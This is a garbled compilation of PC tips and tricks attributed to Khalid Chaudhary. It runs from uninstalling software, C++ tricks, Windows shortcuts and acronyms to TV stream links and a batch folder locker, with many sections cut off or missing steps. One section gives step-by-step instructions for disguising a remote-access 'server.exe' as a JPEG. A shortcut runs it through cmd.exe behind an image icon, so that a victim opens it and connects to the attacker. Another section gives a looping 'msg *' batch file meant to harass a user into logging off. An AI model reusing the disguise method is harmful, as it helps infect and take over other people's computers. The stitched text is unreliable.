there until you remove them manually. To modify/ remove registry, go to “Run”
and then type “Regedit”. And in Regedit, you can make changes related to your
desired software, but if you are not a computer professional, then DO NOT mess
with the registry, because it will create more problems if you un-intentionally
remove/modify the wrong entries.
>>> There is hardly any problem in the online scenario that cannot be resolved by
software. There are also many uninstallers available that you can use to uninstall
specific programs. Also, there are numerous software applications that provide
their own uninstallers with installation packages and you can use them to remove
software completely. The advantage of using these uninstallers is that they
exactly know where your installed software had made changes in your system.
When you start searching about some software uninstallers, you will see many
uninstallers and it will become very difficult to select the perfect one. For this,
your can also get recommendations from your friends or computer professionals
via any forum.
By following these tips, you can easily uninstall your problematic software from
your PC that create problems.
1. Firstly, create a new folder and make sure that the options 'show hidden files' is
checked and “hide extensions for known file types is unchecked. Basically what u
need is to see hidden files and see the extension of all your files on your pc.
2. Paste a copy of your server on the new created folder. let's say
it's called server.exe (that's why you need the extension of files
showing, cause you need to see it to change it)
3. Now you’re going to rename this server.exe to whatever you want, let us say
for example picture.jpeg
4. Windows is going to warn you if you really want to change this extension from
exe to jpeg, click YES.
6. Now that you have a shortcut, rename it to whatever you want, for example,
me.jpeg.
7. Go to properties (on file me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the
server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\
cmd.exe /c picture.jpeg
10. The last field, c picture.jpeg is always the name of the first
file. If you called the first file soccer.avi you gotta write
C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?
11. So what you are doing is when someone clicks on me.jpeg, a cmd will execute
the other file picture.jpeg and the server will run.
12. On that file me.jpeg (shortcut), go to properties and you have an option to
change the icon. Click that and a new window will pop up and u have to write this:
%SystemRoot%\system32\SHELL32.dll. Then press OK.
13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think
better to get a connection from someone.
14. But dont forget one thing, these 2 files must always be together in the same
folder and to get connected to someone they must click on the shortcut created
not on the first file. So rename the files to whatever you want considering the
person and the knowledge they have on this matter.
steps 2:-to close the running program from startup type( "msconfig" then enter
and go to startup and desable the unwanted program )
steps 3:-clean the disk go to my computer and clean up your disk ...
1.Open CMD
2.Write for example: color fc f is for background and c for the letters...
The colors are the same as the previous
4. This command will Make your folder invisble and it can not be seen even in
hidden files and folders
6. You can lock any other folder also by changing the location C:\abc to address of
your folder.
1. While the ternary operator (?:) is well known, many don’t realise that it can
also be used as lvalues.
x = (y < 0) ? 10 : 20;
(a == 0 ? a : b) = 1;
if (a == 0)
a = 1;
else
b = 1;
2. The namespace alias is pretty easy to miss. Once you know about it though, you
will start recognising it everywhere. It is especially useful when you’rr writing a
large code with a lot of namespace hierarchies.
namespace x = boost::filesystem;
3. Variables aren’t the only ones that can be declared in the init part of functions.
You can also declare classes and other functions.
Passing a temporary value to a variable: You can create a temporary value for a
variable using this operator. For example, if you have a class that uses an in class
static initializer without any out of class definition, but sometimes the system fails
to link.
struct Foo {
static int const value = 42;
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
};
template
void f(T const&);
int main() {
// fails to link and tries to get the address of "Foo::value"!
f(Foo::value);
Decay an array to a pointer: The operator also works when you want to pass two
values to a function.
template
void f(T const& a, T const& b);
int main() {
int a[2];
int b[3];
f(a, b); // won't work! different values for "T"!
f(+a, +b); // works! T is "int*" both time
}
5. You must know the id/identity metafunction. Now check out this usecase for it,
which is for non-template cases.
Here is Top 10 list of steps you should take to protect your information and your
computing resources from the hackers of cyberspace..
• Back up everything! You are not invulnerable. Catastrophic data loss can happen
to you -- one worm or Trojan is all it takes.
• Choose passwords that are reasonably hard to guess -- don't just append a few
numbers to a no-brainer. Always change default passwords.
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
• Use an antivirus product like AVG or Norton, and set it to update daily.
• Avoid hacker-bait apps like Internet Explorer and disable automatic scripting on
your e-mail client.
• Use encryption software like PGP (pretty good privacy) when sending sensitive
e-mail. You can also use it to protect your entire hard drive.
• Install a spyware detection app -- or even several. Programs that can be set to
run frequently, like SpyCop, are ideal.
• Disable any system services you're not using, especially apps that could give
others remote access to your computer (like Remote Desktop, RealVNC and
NetBIOS).
• Secure your wireless networks. At home, enable WPA (Wi-Fi protected access)
with a password of at least 20 characters. Configure your laptop to connect in
Infrastructure mode only, and don't add networks unless they use WPA.
>Now you can change the SSID by changing code in blue color and you can change
the
security code in red color.
>Now make sure to save this file as Start.bat and its done.
>Now create another new Notepad file and paste below code into it.
>Save this file as Stop.bat and your Wi-Fi Hotspot stopping process is up.
>So now when ever you want to start the Wi-Fi Hotspot simply double click the
Star.bat
file and your Wi-Fi hotspot will start to broadcast.
>As soon as you are done you can double click the Stop.bat file and your
broadcast
will be stopped.
Types Of Server
2. FTP Servers
This is one of the oldest of the Internet services available. The FTP or File Transfer
Protocol allows the users to securely transfer one or more files of any size
between two computers.
3. Collaboration Servers
In many ways, collaboration software, once called 'groupware,' demonstrates the
original power of the Web. Collaboration software designed to enable users to
collaborate, regardless of location, via the Internet or a corporate intranet and to
work together in a virtual atmosphere.
4. List Servers
List servers lets users better manage their mass mailing lists like open interactive
discussions or one-way lists to deliver newsletters, announcements or advertising.
5. Telnet Servers
The Telnet server lets the users on to a host computer control and work on
remote computers.
6. Web Servers
At its core, a Web server serves static content to a Web browser by loading a file
from a disk and serving it across the network to a user's Web browser. This entire
exchange is mediated by the browser and server talking to each other using HTTP.
7. Virtual Servers
A virtual server is a web server which shares its resources with multiple users. It's
another way of saying that multiple web sites share the resources of one server.
8. Proxy Servers
Proxy server is a server which acts as an intermediary for requests between the
users and the servers. Client connects to the proxy server and the proxy server
evaluates the requests sent by the users simplifies them and control their
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
complexities.
9. Mail Servers
Mail servers help in moving and storing the e-mail over a network via LANs and
WANs or across the Internet.
A. First Click on Start button then Type in search box CMD , and
then Press Enter . As Shown in Following Figure :
C. Now type Product get name and then press Enter . it will
Generate list of Installed Program . As Shown in Following Figure:
4) Dr Watson = drwtsn32.exe
(Troubleshooting tool)
5) DirectX diagnosis = dxdiag.exe
(Diagnose & test DirectX, video &
sound cards)
6) Private character editor =
eudcedit.exe (allows creation or
modification of characters)
7) IExpress Wizard = iexpress.exe
(Create self-extracting / self-installing
package)
Microsoft Synchronization Manager
= mobsync.exe (appears to allow
synchronization of files on the
network for when working offline.
Apparently undocumented).
9) Windows Media Player 5.1 =
mplay32.exe (Retro version of Media
Player, very basic).
10) ODBC Data Source Administrator =
odbcad32.exe (something to do with
databases)
11) Object Packager = packager.exe (to
do with packaging objects for insertion
in files, appears to have
comprehensive help files).
12) System Monitor = perfmon.exe
(very useful, highly configurable tool,
tells you everything you ever wanted
to know about any aspect of PC
performance, for uber-geeks only )
13) Program Manager = progman.exe
(Legacy Windows 3.x desktop shell).
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
Guys I’ll teach u how to unlock Nokia security code. There r 3 methods to unlock Nokia
mobile security code:
1. Get Ur Nokia mobile codes using Ur IMEI No. For this download the Nokia mobile
calculator from the link at the end of this post. Insert Ur IMEI No. n press calculates u
will get list of codes for ur mobile at the right side.
3. This method is risky it'll delete all data n flash the mobile actually. I’ll teach u this
when i teach u how to flash a mobile on Ur own.
Download links -
1. - http://dc641.4shared.com/download/dCXyqY8T?tsid=20130603-143006-a0d24d0f
Now after you have done writing your text click on Post ! you will have your status
in BlueColour.
If u want to log in to your online bank a/c or some thing else and to not get
hacked by key loggers
----Type osk
----Press Enter
Using this notepad trick you can annoy anyone and can actually force them to log
off .
This notepad trick will create an infinite cycle of a message in the computer.
Follow the steps to know more:
>Open Notepad.
> Copy the below mentioned text in your notepad file:
@echo off
:BEGIN
msg * Welcome
msg * To
msg * Pc TiPs AnD TriCkS
msg * Thanks for visiting
goto BEGIN
>Save the file with .bat extension like message.bat. After saving the file just open
it (by double clicking) and see what happens..........
M ↔ Mute
Z Zoom Mode
Ctrl+Right/Left ↔ To Skip a 1 minute in
the Audio/
Video T ↔ Check remaining Time in Video
Ctrl+O ↔ Open Single File
Esc ↔ Exit Full Screen
A ↔ Aspect ratio
B ↔ Audio Track Cycle
C ↔ Crop Screen Shift+s ↔ Capture Photo
Shift+r ↔ Recording Video
F11 ↔ Windows Full Screen
F Full Screen
Space Play/Pause
T Show Position/Time
S Stop
Ctrl + Q Quit
+/- Faster/Slower
N/P Next/Previous
Ctrl+up Volume Up
M Mute
Z Zoom Mode
A Aspect ratio
C Crop Screen
Now you can watch free Tv on your pc by just using a VLC player.
Step 1 : First of all you need to have VLC player, if you don’t have vlc player kindly
download and install it
Step 2 : Now open Vlc Player, and select streaming option from the media menu
present in the menu bar.
Step 3 : Select network option and enter the url of the streaming channel. For
example if you want to view B4u Music you need to add url
rtsp://217.146.95.166:554/playlist/ch12zqcif.3gp
in the url field and then select play option from the stream drop down menu.
Step 4 : After you click play in the above step, the channel will start streaming and
you can watch your favorite channels.
Here is the List of many other channels which you will love to watch
Channel Name
Link
NDTV rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_33.sdp
NDTV Profit rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_31.sdp
Times Now rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_2.sdp
Aaj Tak rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_4.sdp
CNBC Aawaz rtsp://ss1c6.idc.mundu.tv:554/prf1/cid_34.sdp
CNBC TV 18 rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_35.sdp
Headlines Today rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_7.sdp
NDTV 24×7 rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_29.sdp
NK News rtsp://94.75.250.53:554/rtplive/rknews.sdp
RAJ News rtsp://94.75.250.220:1935/live/rajnews2.sdp
ETV rtsp://94.75.250.53/rtplive/etv2low.sdp
Studio N rtsp://94.75.250.220:1935/live/studion2
SVBC rtsp://94.75.250.220/rtplive/svbclow
Zoo Vision rtsp://stream.zoovision.com/live.sdp
B4u Music rtsp://217.146.95.166:554/playlist/ch12zqcif.3gp
iMusic rtsp://217.146.95.166:554/playlist/ch26yqcif.3gp
Zee Tamil rtsp://121.244.145.226:554/prf1/cid_54.sdp
Zee Kannad rtsp://121.244.145.226:554/prf1/cid_55.sdp
Zee Bangla rtsp://121.244.145.226:554/prf1/cid_52.sdp
Music Box rtsp://stream.the.sk/live/musicbox/musicbox-3m.3gp
Bella Tv rtsp://217.146.95.166:554/playlist/ch29yqcif.3gp
Fashion Tv rtsp://217.146.95.166:554/playlist/ch27yqcif.3gp
Adventure rtsp://video3.multicasttech.com/AFTVAdventure3GPP296.sdp
Horror rtsp://video2.multicasttech.com/AFTVHorror3GPP296.sdp
Comedy rtsp://video3.multicasttech.com/AFTVComedy3GPP96.sdp
Classic rtsp://video3.multicasttech.com/AFTVClassics3GPP296.sdp
Crime rtsp://video2.multicasttech.com/AFTVCrime3GPP296.sdp
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
Mystery rtsp://video2.multicasttech.com/AFTVMystery3GPP296.sdp
Clubbing Tv rtsp://217.146.95.166:554/playlist/ch21yqcif.3gp
1- www.laptopdrivers.net
2- www.driverzone.com
3- www.opendrivers.com
4- www.notebook-driver.com
5- www.notebookera.com
2. Use multiple accounts so that you dont get spams in your personal/ official
email address.
4. Use VPN for hiding identity and secure browsing when using internet out of
your home.
titles:-
#A
ADSL – Asymmetric Digital Subscriber Line
AGP – Accelerated Graphics Port
ALI – Acer Labs, Incorporated
ALU – Arithmetic Logic Unit
#B
BFG – BFG Technologies
BIOS – Basic Input Output System
BNC – Barrel Nut Connector
#C
CAS – Column Address Signal
CD – Compact Disk
CDR – Compact Disk Recorder
CDRW – Compact Disk Re-Writer
CD-ROM – Compact Disk – Read Only Memory
CFM – Cubic Feet per Minute (ft�/min)
CMOS – Complementary Metal Oxide Semiconductor
CPU – Central Processing Unit
CTX – CTX Technology Corporation (Commited to
Excellence)
#D
DDR – Double Data Rate
DDR-SDRAM – Double Data Rate – Synchronous
Dynamic Random Access Memory
DFI – DFI Inc. (Design for Innovation)
DIMM – Dual Inline Memory Module
DRAM – Dynamic Random Access Memory
DPI – Dots Per Inch
DSL – See ASDL
DVD – Digital Versatile Disc
DVD-RAM – Digital Versatile Disk – Random Access
Memory
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
#E
ECC – Error Correction Code
ECS – Elitegroup Computer Systems
EDO – Extended Data Out
EEPROM – Electrically Erasable Programmable Read-
Only Memory
EPROM – Erasable Programmable Read-Only Memory
EVGA – EVGA Corporation
#F
FC-PGA – Flip Chip Pin Grid Array
FDC – Floppy Disk Controller
FDD – Floppy Disk Drive
FPS – Frame Per Second
FPU – Floating Point Unit
FSAA – Full Screen Anti-Aliasing
FS – For Sale
FSB – Front Side Bus
#G
GB – Gigabytes
GBps – Gigabytes per second or Gigabits per second
GDI – Graphical Device Interface
GHz – GigaHertz
#H
HDD – Hard Disk Drive
HIS – Hightech Information System Limited
HP – Hewlett-Packard Development Company
HSF – Heatsink-Fan
#I
IBM – International Business Machines Corporation
IC – Integrated Circuit
IDE – Integrated Drive Electronics
IFS- Item for Sale
IRQ – Interrupt Request
ISA – Industry Standard Architecture
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
#J
JBL – JBL (Jame B. Lansing) Speakers
JVC – JVC Company of America
#K
Kbps – Kilobits Per Second
KBps – KiloBytes per second
#L
LG – LG Electronics
LAN – Local Area Network
LCD – Liquid Crystal Display
LDT – Lightning Data Transport
LED – Light Emitting Diode
#M
MAC – Media Access Control
MB � MotherBoard or Megabyte
MBps – Megabytes Per Second
Mbps – Megabits Per Second or Megabits Per Second
MHz – MegaHertz
MIPS – Million Instructions Per Second
MMX – Multi-Media Extensions
MODEM-Modulator/demodulator
MSI – Micro Star International
#N
NAS – Network Attached Storage
NAT – Network Address Translation
NEC – NEC Corporation
NIC – Network Interface Card
#O
OC – Overclock (Over Clock)
OCZ – OCZ Technology
OEM – Original Equipment Manufacturer
#P
PC – Personal Computer
PCB – Printed Circuit Board
PCI – Peripheral Component Interconnect
PDA – Personal Digital Assistant
PCMCIA – Peripheral Component Microchannel
Interconnect Architecture
PGA – Professional Graphics Array
PLD – Programmable Logic Device
PM – Private Message / Private Messaging
PnP – Plug ‘n Play
PNY – PNY Technology
POST – Power On Self Test
PPPoA – Point-to-Point Protocol over ATM
PPPoE – Point-to-Point Protocol over Ethernet
PQI – PQI Corporation
PSU – Power Supply Unit
#R
RAID – Redundant Array of Inexpensive Disks
RAM – Random Access Memory
RAMDAC – Random Access Memory Digital Analog
Convertor
RDRAM – Rambus Dynamic Random Access Memory
ROM – Read Only Memory
RPM – Revolutions Per Minute
#S
SASID – Self-scanned Amorphous Silicon Integrated
DisplaySCA – SCSI Configured Automatically
SCSI – Small Computer System Interface
SDRAM – Synchronous Dynamic Random Access
Memory
SECC – Single Edge Contact Connector
SODIMM – Small Outline Dual Inline Memory Module
SPARC – Scalable Processor ArChitecture
SOHO – Small Office Home Office
SRAM – Static Random Access Memory
SSE – Streaming SIMD Extensions
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
#T
TB – Terabytes
TBps – Terabytes per second
Tbps – Terabits per second
TDK – TDK Electronics
TEC – Thermoelectric Cooler
TPC – TipidPC
TWAIN – Technology Without An Important Name
#U
UART – Universal Asynchronous Receiver/Transmitter
USB – Universal Serial Bus
UTP – Unshieled Twisted Pair
#V
VCD – Video CD
VPN – Virtual Private Network
#W
WAN – Wide Area Network
WTB – Want to Buy
WYSIWYG – What You See Is What You Get
#X
XGA – Extended Graphics Array
XFX – XFX Graphics, a Division of Pine
XMS – Extended Memory Specification
XT – Extended Technology
#Y
Y2K-Year 2000
#Z
ZIF-Zero Insertion Fee
Step 2 : Press the number 4 and apply Square root which gives result 2.
Step 3 : Now subtract 2 from the answer ie, 2-2 and press equals [=]
To copy a file
Press and hold down the CTRL key while you drag the file to another folder.
To create a shortcut
Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.
F4: Selects the Go To A Different Folder box and moves down the entries in the
box (if the toolbar is active in Windows Explorer)F5: Refreshes the current
window.F6: Moves among panes in Windows ExplorerCTRL+G: Opens the Go To
Folder tool (in Windows 95 Windows Explorer only)CTRL+Z: Undo the last
commandCTRL+A: Select all the items in the current windowBACKSPACE: Switch
to the parent folderSHIFT+click+Close button: For folders, close the current folder
plus all parent folders
Properties control
Accessibility shortcuts
Press SHIFT five times: Toggles StickyKeys on and offPress down and hold the right
SHIFT key for eight seconds: Toggles FilterKeys on and offPress down and hold the
NUM LOCK key for five seconds: Toggles ToggleKeys on and offLeft ALT+left
SHIFT+NUM LOCK: Toggles MouseKeys on and offLeft ALT+left SHIFT+PRINT
SCREEN: Toggles high contrast on and off
TAB: Move to the next control in the dialog boxSHIFT+TAB: Move to the previous
control in the dialog boxSPACEBAR: If the current control is a button, this clicks
the button. If the current control is a check box, this toggles the check box. If the
current control is an option, this selects the option.ENTER: Equivalent to clicking
the selected button (the button with the outline)ESC: Equivalent to clicking the
Cancel buttonALT+underlined letter in dialog box item: Move to the
corresponding item
Step 1: Have the Folder you want to put the background on open!
Step 2: Open up Notepad, then simply paste in this code:
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=***Picture Location Here!***\***Name of File!***
Step 3: Go to ur picture (the picture you want to use!) and right click and select
properties and find the file location for example lets say my file is in "my hardrive"
it
would be located at "C:\\" understand? copy the location!
Step 4: Now go back to ur text document (notepad) and where it says ***Picture
Location Here!*** paste the location...u copied in the previus step!
Step 5: Now after u've done that where it says ***Name of File!*** type the
name
of the file including the .jpg .bmp .bip. jpeg etc
Step 6: Save the text document as "desktop.ini" be sure to remember the .ini
extension! click Save as "All Files" not "Text Document" and save the document in
the
folder where u want the background to be!
Now just close the folder and open it again it should show the picture as a
background!
Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto
UNLOCK
if NOT EXIST Private goto MDENTER PASSWORD TO OPEN
:CONFIRM
echo -----------------------------------------------------------
echo ================== HarryHacker ==================
echo -----------------------------------------------------------
echo Are you sure you want to lock the folder(Y/N)
echo Press for Yes and Press (N) for No.
echo -----------------------------------------------------------
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo -----------------------------------------------------------
echo ==================HarryHacker ==================
echo -----------------------------------------------------------
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== YOUR PASSWORD goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
Step 3:- Now change the password in the if NOT %pass%==YOUR PASSWORDgoto
FAIL line replace text of Your
Password with your password for the folder lock.
Step 4:- Now save this file as locker.bat and you are done.
Step 5:- Now Open the Locker.bat file and enter your password to open a private
folder of yours.
Step 6:- Now copy paste the files which you want to hide and make it secure in
the private folder.
Step 7:- Now again open the Locker.bat file and press 'Y' to lock the private folder
with your password.
Step 8:- Now to again open the secured files open the locker.bat file Enter your
password and your files are there for you.
back ”
Let me tell you thats easy as well. Just
follow the below simple steps.
Step 1. Scroll Back up and perform steps
1,2,3,4 and 5 again.
Step 2. ok Now you have Completed the 5
steps listed above. Just make sure you
have completed till
” Select volume E ”
Step 3 . Earlier in the article to Hide the
drive we typed ” Remove letter E ” , Now
to unhide it we will
Type ” Assign letter E ” and hit Enter.
Thats it
Step 4. Check if you have successfully got
the drive back. Now Just Restart your
Computer if you wish to.